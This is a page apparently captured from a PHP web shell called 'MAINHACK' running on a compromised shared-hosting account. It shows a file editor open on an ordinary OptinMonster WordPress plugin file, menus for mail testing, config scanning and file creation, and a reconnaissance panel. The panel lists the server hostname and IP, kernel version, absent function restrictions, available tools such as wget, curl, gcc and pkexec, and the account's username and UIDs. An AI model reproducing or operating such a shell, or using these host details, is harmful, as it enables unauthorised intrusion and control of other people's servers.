[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SeedProd.php
<?php /** * SeedProd class. * * @since 2.10.0 * * @package OMAPI * @author Justin Sternberg */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } /** * SeedProd class. * * @since 2.10.0 */ class OMAPI_Promos_SeedProd extends OMAPI_Promos_Base { /** * The promo id. * * @var string */ protected $promo = 'seedprod'; /** * The plugin id. * * @var string */ protected $plugin_id = 'coming-soon/coming-soon.php'; /** * Loads the OptinMonster admin menu. * * @since 2.10.0 */ protected function register_page() { return add_submenu_page( $this->base->menu->parent_slug(), // Parent slug esc_html__( 'SeedProd', 'optin-monster-api' ), // Page title esc_html__( 'Landing Pages', 'optin-monster-api' ), $this->base->access_capability( 'optin-monster-seedprod' ), // Cap 'optin-monster-seedprod', // Slug array( $this, 'display_page' ) // Callback ); } /** * Redirects to the seedprod admin page. * * @since 2.10.0 */ public function redirect_plugin() { $slug = ! empty( $this->plugin['which'] ) && 'default' !== $this->plugin['which'] ? 'seedprod_pro' : 'seedprod_lite'; $url = add_query_arg( 'page', $slug, admin_url( 'admin.php' ) ); wp_safe_redirect( esc_url_raw( $url ) ); exit; } /** * Outputs the OptinMonster settings page. * * @since 2.10.0 */ public function display_page() { $plugin_search_url = is_multisite() ? network_admin_url( 'plugin-install.php?tab=search&type=term&s=seedprod' ) : admin_url( 'plugin-install.php?tab=search&type=term&s=seedprod' ); $this->base->output_view( 'seedprod-settings-page.php', array( 'plugin' => $this->plugin, 'plugin_search_url' => $plugin_search_url, 'button_activate' => __( 'Start Creating Landing Pages', 'optin-monster-api' ), 'button_install' => __( 'Start Creating Landing Pages', 'optin-monster-api' ), ) ); } /** * Loads assets for the settings page. * * @since 2.10.0 */ public function assets() { parent::assets(); wp_enqueue_style( 'om-tp-admin-css', $this->base->url . 'assets/dist/css/seedprod.min.css', false, $this->base->asset_version() ); } /** * Add body classes. * * @since 2.10.0 */ public function add_body_classes( $classes ) { $classes .= ' omapi-seedprod '; return $classes; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.26 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830